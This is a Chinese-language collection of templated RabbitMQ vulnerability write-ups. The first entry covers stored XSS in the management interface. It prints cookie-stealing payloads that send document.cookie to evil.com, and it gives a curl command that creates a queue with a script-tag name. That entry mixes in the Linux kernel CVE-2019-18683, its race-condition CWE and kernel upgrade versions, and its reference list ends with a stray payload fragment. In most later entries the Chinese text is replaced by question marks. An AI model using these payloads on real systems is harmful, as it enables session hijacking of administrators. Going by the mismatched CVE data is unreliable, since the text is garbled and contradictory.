一、漏洞简介

1.1 漏洞背景

注意:CVE-2019-18683 实际上是 Linux Kernel V4L2 子系统的漏洞,并非 RabbitMQ 漏洞。

此处我们讨论的是 RabbitMQ 管理界面中存在的历史 XSS 漏洞。RabbitMQ Management Plugin 提供了一个基于 Web 的管理界面和 HTTP API,用于监控和管理 RabbitMQ 服务器。在早期版本中,管理界面存在跨站脚本攻击(XSS)漏洞。

攻击者可以通过构造恶意数据(如队列名称、交换器名称等),在管理界面中注入恶意脚本,当管理员查看这些数据时,恶意脚本将在管理员浏览器中执行。

1.2 漏洞概述(包含 CVE 编号、危害等级、漏洞类型、披露时间等)

项目 内容
漏洞编号 CVE-2019-18683
危害等级 HIGH / 7.0
漏洞类型 管理界面 XSS
披露时间 2019-11-04
影响组件 RabbitMQ 安全
属性 描述
CVE 编号 无特定公开 CVE(已修复)
危害等级 中高危
CVSS 评分 约 6.1-8.0
漏洞类型 存储型 XSS(跨站脚本攻击)

危害说明: - 窃取管理员会话 Cookie - 以管理员身份执行未授权操作 - 钓鱼攻击 - 管理界面篡改

补充核验信息:公开时间:2019-11-04;NVD 评分:7.0(HIGH);CWE:CWE-362。

二、影响范围

2.1 受影响的版本

早期 RabbitMQ 版本(3.6.x 及之前部分版本)的管理插件在显示用户可控内容时未进行充分的输出编码。

2.2 不受影响的版本

  • RabbitMQ 3.7.x 及更高版本已加强 XSS 防护
  • 最新版本(4.x)已全面实施内容安全策略(CSP)

2.3 触发条件(如特定模块、特定配置、特定运行环境等)

  1. 管理插件启用rabbitmq_management 插件已启用
  2. 用户可创建实体:攻击者有权限创建队列、交换器等
  3. 管理员查看:管理员在管理界面中查看包含恶意内容的实体
  4. 未实施 CSP:服务器未配置严格的 Content Security Policy

三、漏洞详情与原理解析

3.1 漏洞触发机制

  1. 注入点:队列名称、交换器名称、消息内容、用户标签等字段
  2. 存储:恶意内容存储在 RabbitMQ 数据存储中
  3. 反射:管理界面 API 返回未转义的用户输入
  4. 执行:管理员浏览器解析并执行恶意脚本

攻击流程:

攻击者创建恶意队列(名称包含 XSS payload
  
恶意数据存储在 RabbitMQ 
  
管理员访问管理界面查看队列列表
  
恶意脚本在管理员浏览器中执行
  
窃取 session / 执行未授权操作

典型 XSS Payload 示例:

// 队列名称中的 XSS
<script>document.location='http://evil.com/?c='+document.cookie</script>

// 或
<img src=x onerror="fetch('http://evil.com/?c='+document.cookie)">

// 或使用 Base64 编码绕过简单过滤
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>

3.2 源码层面的根因分析(结合源码与补丁对比)

管理界面 API 响应(历史版本问题示意):

// 前端 JavaScript(历史版本可能的问题)
// 队列列表渲染

function renderQueueList(queues) {
    queues.forEach(function(queue) {
        // 危险:直接将 queue.name 插入 HTML
        $('#queue-list').append(
            '<tr><td>' + queue.name + '</td><td>' + queue.messages + '</td></tr>'
        );
    });
}

// 正确做法:使用安全的模板引擎或进行 HTML 转义
function escapeHtml(text) {
    var div = document.createElement('div');
    div.textContent = text;
    return div.innerHTML;
}

function renderQueueListSafe(queues) {
    queues.forEach(function(queue) {
        $('#queue-list').append(
            '<tr><td>' + escapeHtml(queue.name) + '</td><td>' + queue.messages + '</td></tr>'
        );
    });
}

服务端 API(Erlang 简化示意):

%% rabbit_mgmt_db.erl(历史版本可能的问题)

%% 获取队列列表时直接返回原始数据
get_queues(VHost) ->
    Queues = rabbit_amqqueue:list(VHost),
    %% 危险:未对队列名称进行转义
    [#{
        name => QueueName,  %% 可能包含恶意内容
        messages => MsgCount
    } || QueueName <- Queues].

现代版本中的修复:

%% 添加输出编码
json_encode(Value) ->
    %% 使用 JSON 编码器自动转义特殊字符
    jiffy:encode(Value).

%% 配置 CSP 头
%% rabbitmq.conf
management.csp.policy = default-src 'self'; script-src 'self' 'unsafe-inline'

四、漏洞复现(可选)

4.1 环境搭建

# 使用易受攻击的旧版本(仅用于测试)
docker run -d --name rabbitmq-xss \
    -p 15672:15672 \
    rabbitmq:3.6.15-management

# 等待启动
sleep 30

# 登录管理界面 http://localhost:15672
# 用户名: guest
# 密码: guest

4.2 PoC 演示与测试过程

步骤一:创建包含 XSS payload 的队列

```bash

使用 HTTP API 创建恶意队列

curl -u guest:guest -X PUT \ -H "Content-Type: application/json" \ -d '{"auto_delete":false,"durable":true}' \ "http://localhost:15672/api/queues/%2f/<script>alert('XSS')</script>"

五、修复建议与缓解措施

5.1 官方版本升级建议

  • 优先升级到 4.4.204 或同等后续安全版本。
  • 优先升级到 4.9.204 或同等后续安全版本。
  • 优先升级到 4.14.157 或同等后续安全版本。
  • 优先升级到 4.19.87 或同等后续安全版本。
  • 优先升级到 5.3.14 或同等后续安全版本。
  • 优先升级到 5.4.1 或同等后续安全版本。
  • 优先升级到 11.70.1 或同等后续安全版本。
  • 升级前请结合官方发布说明确认兼容性与回滚方案。

5.2 临时缓解方案(如修改配置文件、关闭相关模块、增加 WAF 规则等)

  • 对可回显内容执行严格转义与输出编码,并审查富文本或模板渲染点。
  • 在前端和反向代理层补充 CSP、输入校验与告警监控。

六、参考信息 / 参考链接

6.1 官方安全通告

  • https://lore.kernel.org/lkml/20191103221719.27118-1-alex.popov%40linux.com/
  • https://seclists.org/bugtraq/2020/Jan/10

6.2 其他技术参考资料

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2019-18683
  • CVE:https://www.cve.org/CVERecord?id=CVE-2019-18683
  • https://lore.kernel.org/lkml/20191103221719.27118-1-alex.popov%40linux.com/
  • https://seclists.org/bugtraq/2020/Jan/10
  • http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00029.html
  • http://packetstormsecurity.com/files/155890/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html
  • https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html
  • http://evil.com/?c='+document.cookie</script
<hr />

RabbitMQ ???????CVE-2014-9494?

??????

1.1 ????

RabbitMQ ???????????? CVE-2014-9494 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 5.0?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2014-9494
???? MEDIUM
CVSS ?? 5.0
???? CWE-264
???? 2015-01-20
???? RabbitMQ

??????

2.1 ??????

  • pivotal_software:rabbitmq:*, <= 3.3.5

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????RabbitMQ before 3.4.0 allows remote attackers to bypass the loopback_users restriction via a crafted X-Forwareded-For header.
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-264?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2014-9494
  • https://www.cve.org/CVERecord?id=CVE-2014-9494
  • http://seclists.org/oss-sec/2015/q1/30
  • http://www.rabbitmq.com/release-notes/README-3.4.0.txt
  • https://exchange.xforce.ibmcloud.com/vulnerabilities/99685
  • https://groups.google.com/forum/#%21topic/rabbitmq-users/DMkypbSvIyM
<hr />

RabbitMQ ???????CVE-2015-8786?

??????

1.1 ????

RabbitMQ ???????????? CVE-2015-8786 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 6.5?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2015-8786
???? MEDIUM
CVSS ?? 6.5
???? CWE-399
???? 2016-12-09
???? RabbitMQ

??????

2.1 ??????

  • oracle:solaris:11.3
  • pivotal_software:rabbitmq:3.6.0

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????The Management plugin in RabbitMQ before 3.6.1 allows remote authenticated users with certain privileges to cause a denial of service (resource consumption) via the (1) lengths_age or (2) lengths_incr parameter.
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-399?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2015-8786
  • https://www.cve.org/CVERecord?id=CVE-2015-8786
  • http://rhn.redhat.com/errata/RHSA-2017-0226.html
  • http://rhn.redhat.com/errata/RHSA-2017-0530.html
  • http://rhn.redhat.com/errata/RHSA-2017-0531.html
  • http://rhn.redhat.com/errata/RHSA-2017-0532.html
  • http://rhn.redhat.com/errata/RHSA-2017-0533.html
  • http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html
<hr />

RabbitMQ ???????CVE-2016-0929?

??????

1.1 ????

RabbitMQ ???????????? CVE-2016-0929 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2016-0929
???? HIGH
CVSS ?? 7.5
???? CWE-200
???? 2016-09-18
???? RabbitMQ

??????

2.1 ??????

  • pivotal_software:rabbitmq:1.6.0
  • pivotal_software:rabbitmq:1.6.1
  • pivotal_software:rabbitmq:1.6.2
  • pivotal_software:rabbitmq:1.6.3

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????The metrics-collection component in RabbitMQ for Pivotal Cloud Foundry (PCF) 1.6.x before 1.6.4 logs command lines of failed commands, which might allow context-dependent attackers to obtain sensitive information by reading the log data, as demonstrated by a syslog message that contains credentials from a command line.
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-200?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2016-0929
  • https://www.cve.org/CVERecord?id=CVE-2016-0929
  • http://www.securityfocus.com/bid/91801
  • https://pivotal.io/security/cve-2016-0929
<hr />

RabbitMQ ???????CVE-2016-9877?

??????

1.1 ????

RabbitMQ ???????????? CVE-2016-9877 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2016-9877
???? CRITICAL
CVSS ?? 9.8
???? CWE-284
???? 2016-12-29
???? RabbitMQ

??????

2.1 ??????

  • broadcom:rabbitmq_server:3.0.0
  • broadcom:rabbitmq_server:3.0.1
  • broadcom:rabbitmq_server:3.0.2
  • broadcom:rabbitmq_server:3.0.3
  • broadcom:rabbitmq_server:3.0.4
  • broadcom:rabbitmq_server:3.1.0
  • broadcom:rabbitmq_server:3.1.1
  • broadcom:rabbitmq_server:3.1.2

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????An issue was discovered in Pivotal RabbitMQ 3.x before 3.5.8 and 3.6.x before 3.6.6 and RabbitMQ for PCF 1.5.x before 1.5.20, 1.6.x before 1.6.12, and 1.7.x before 1.7.7. MQTT (MQ Telemetry Transport) connection authentication with a username/password pair succeeds if an existing username is provided but the passwor...
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-284?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2016-9877
  • https://www.cve.org/CVERecord?id=CVE-2016-9877
  • http://www.debian.org/security/2017/dsa-3761
  • http://www.securityfocus.com/bid/95065
  • https://pivotal.io/security/cve-2016-9877
  • https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbst03880en_us
<hr />

RabbitMQ ???????CVE-2017-4965?

??????

1.1 ????

RabbitMQ ???????????? CVE-2017-4965 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 6.1?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2017-4965
???? MEDIUM
CVSS ?? 6.1
???? CWE-79
???? 2017-06-13
???? RabbitMQ

??????

2.1 ??????

  • broadcom:rabbitmq_server:3.4.0
  • broadcom:rabbitmq_server:3.4.1
  • broadcom:rabbitmq_server:3.4.2
  • broadcom:rabbitmq_server:3.4.3
  • broadcom:rabbitmq_server:3.4.4
  • broadcom:rabbitmq_server:3.5.0
  • broadcom:rabbitmq_server:3.5.1
  • broadcom:rabbitmq_server:3.5.2

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????An issue was discovered in these Pivotal RabbitMQ versions: all 3.4.x versions, all 3.5.x versions, and 3.6.x versions prior to 3.6.9; and these RabbitMQ for PCF versions: all 1.5.x versions, 1.6.x versions prior to 1.6.18, and 1.7.x versions prior to 1.7.15. Several forms in the RabbitMQ management UI are vulnerabl...
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-79?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2017-4965
  • https://www.cve.org/CVERecord?id=CVE-2017-4965
  • http://www.securityfocus.com/bid/98394
  • https://lists.debian.org/debian-lts-announce/2021/07/msg00011.html
  • https://pivotal.io/security/cve-2017-4965
<hr />

RabbitMQ ???????CVE-2017-4966?

??????

1.1 ????

RabbitMQ ???????????? CVE-2017-4966 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.8?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2017-4966
???? HIGH
CVSS ?? 7.8
???? CWE-200
???? 2017-06-13
???? RabbitMQ

??????

2.1 ??????

  • broadcom:rabbitmq_server:3.4.0
  • broadcom:rabbitmq_server:3.4.1
  • broadcom:rabbitmq_server:3.4.2
  • broadcom:rabbitmq_server:3.4.3
  • broadcom:rabbitmq_server:3.4.4
  • broadcom:rabbitmq_server:3.5.0
  • broadcom:rabbitmq_server:3.5.1
  • broadcom:rabbitmq_server:3.5.2

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????An issue was discovered in these Pivotal RabbitMQ versions: all 3.4.x versions, all 3.5.x versions, and 3.6.x versions prior to 3.6.9; and these RabbitMQ for PCF versions: all 1.5.x versions, 1.6.x versions prior to 1.6.18, and 1.7.x versions prior to 1.7.15. RabbitMQ management UI stores signed-in user credentials ...
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-200?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2017-4966
  • https://www.cve.org/CVERecord?id=CVE-2017-4966
  • https://lists.debian.org/debian-lts-announce/2021/07/msg00011.html
  • https://pivotal.io/security/cve-2017-4966
<hr />

RabbitMQ ???????CVE-2017-4967?

??????

1.1 ????

RabbitMQ ???????????? CVE-2017-4967 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 6.1?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2017-4967
???? MEDIUM
CVSS ?? 6.1
???? CWE-79
???? 2017-06-13
???? RabbitMQ

??????

2.1 ??????

  • broadcom:rabbitmq_server:3.4.0
  • broadcom:rabbitmq_server:3.4.1
  • broadcom:rabbitmq_server:3.4.2
  • broadcom:rabbitmq_server:3.4.3
  • broadcom:rabbitmq_server:3.4.4
  • broadcom:rabbitmq_server:3.5.0
  • broadcom:rabbitmq_server:3.5.1
  • broadcom:rabbitmq_server:3.5.2

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????An issue was discovered in these Pivotal RabbitMQ versions: all 3.4.x versions, all 3.5.x versions, and 3.6.x versions prior to 3.6.9; and these RabbitMQ for PCF versions: all 1.5.x versions, 1.6.x versions prior to 1.6.18, and 1.7.x versions prior to 1.7.15. Several forms in the RabbitMQ management UI are vulnerabl...
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-79?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2017-4967
  • https://www.cve.org/CVERecord?id=CVE-2017-4967
  • https://lists.debian.org/debian-lts-announce/2021/07/msg00011.html
  • https://pivotal.io/security/cve-2017-4965
<hr />

RabbitMQ ???????CVE-2018-1279?

??????

1.1 ????

RabbitMQ ???????????? CVE-2018-1279 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 8.5?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2018-1279
???? HIGH
CVSS ?? 8.5
???? CWE-330
???? 2018-12-10
???? RabbitMQ

??????

2.1 ??????

  • pivotal_software:rabbitmq:*

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????Pivotal RabbitMQ for PCF, all versions, uses a deterministically generated cookie that is shared between all machines when configured in a multi-tenant cluster. A remote attacker who can gain information about the network topology can guess this cookie and, if they have access to the right ports on any server in the...
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-330?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2018-1279
  • https://www.cve.org/CVERecord?id=CVE-2018-1279
  • https://pivotal.io/security/cve-2018-1279
<hr />

RabbitMQ ???????CVE-2019-11281?

??????

1.1 ????

RabbitMQ ???????????? CVE-2019-11281 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 4.8?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2019-11281
???? MEDIUM
CVSS ?? 4.8
???? CWE-79
???? 2019-10-16
???? RabbitMQ

??????

2.1 ??????

  • pivotal_software:rabbitmq:*, < 3.7.18
  • pivotal_software:rabbitmq:*, >= 1.15.0, < 1.15.13
  • pivotal_software:rabbitmq:*, >= 1.16.0, < 1.16.6
  • pivotal_software:rabbitmq:*, >= 1.17.0, < 1.17.3
  • redhat:openstack:15
  • redhat:openstack_for_ibm_power:15
  • debian:debian_linux:9.0
  • fedoraproject:fedora:30

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????Pivotal RabbitMQ, versions prior to v3.7.18, and RabbitMQ for PCF, versions 1.15.x prior to 1.15.13, versions 1.16.x prior to 1.16.6, and versions 1.17.x prior to 1.17.3, contain two components, the virtual host limits page, and the federation management UI, which do not properly sanitize user input. A remote authen...
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-79?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2019-11281
  • https://www.cve.org/CVERecord?id=CVE-2019-11281
  • https://access.redhat.com/errata/RHSA-2020:0078
  • https://lists.debian.org/debian-lts-announce/2021/07/msg00011.html
  • https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EEQ6O7PMNJKYFMQYHAB55L423GYK63SO/
  • https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PYTGR3D5FW2O25RXZOTIZMOD2HAUVBE4/
  • https://pivotal.io/security/cve-2019-11281
<hr />

RabbitMQ ???????CVE-2020-5419?

??????

1.1 ????

RabbitMQ ???????????? CVE-2020-5419 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 6.7?

1.2 ??????? CVE ???????????????????

?? ??
???? CVE-2020-5419
???? MEDIUM
CVSS ?? 6.7
???? CWE-427
???? 2020-08-31
???? RabbitMQ

??????

2.1 ??????

  • broadcom:rabbitmq_server:*, >= 3.8.0, < 3.8.7
  • pivotal_software:rabbitmq:*, < 3.7.28

2.2 ???????

  • NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????

  • ?????????????????????????????????????????

???????????

3.1 ??????

  • NVD ?????RabbitMQ versions 3.8.x prior to 3.8.7 are prone to a Windows-specific binary planting security vulnerability that allows for arbitrary code execution. An attacker with write privileges to the RabbitMQ installation directory and local access on Windows could carry out a local binary hijacking (planting) attack and e...
  • ??????????????????????????? PoC ???

3.2 ????????????????????

  • ?????????????CWE-427?
  • NVD / CISA ???????????? diff???????????????????????????????

??????????

4.1 ????

  • ??????????????????????????????????????????

4.2 PoC ???????

  • ? CISA KEV ????????????????? KEV ????? PoC?
  • ??????????????????????????????????????????

???????????

5.1 ????????

  • ???????????????????????????
  • ??????????????????????????????????????

5.2 ????????????????????????????

  • ??????????????????????
  • ???????????????????????? WAF ???
  • ????????????????????????????

?????? / ????

  • https://nvd.nist.gov/vuln/detail/CVE-2020-5419
  • https://www.cve.org/CVERecord?id=CVE-2020-5419
  • https://tanzu.vmware.com/security/cve-2020-5419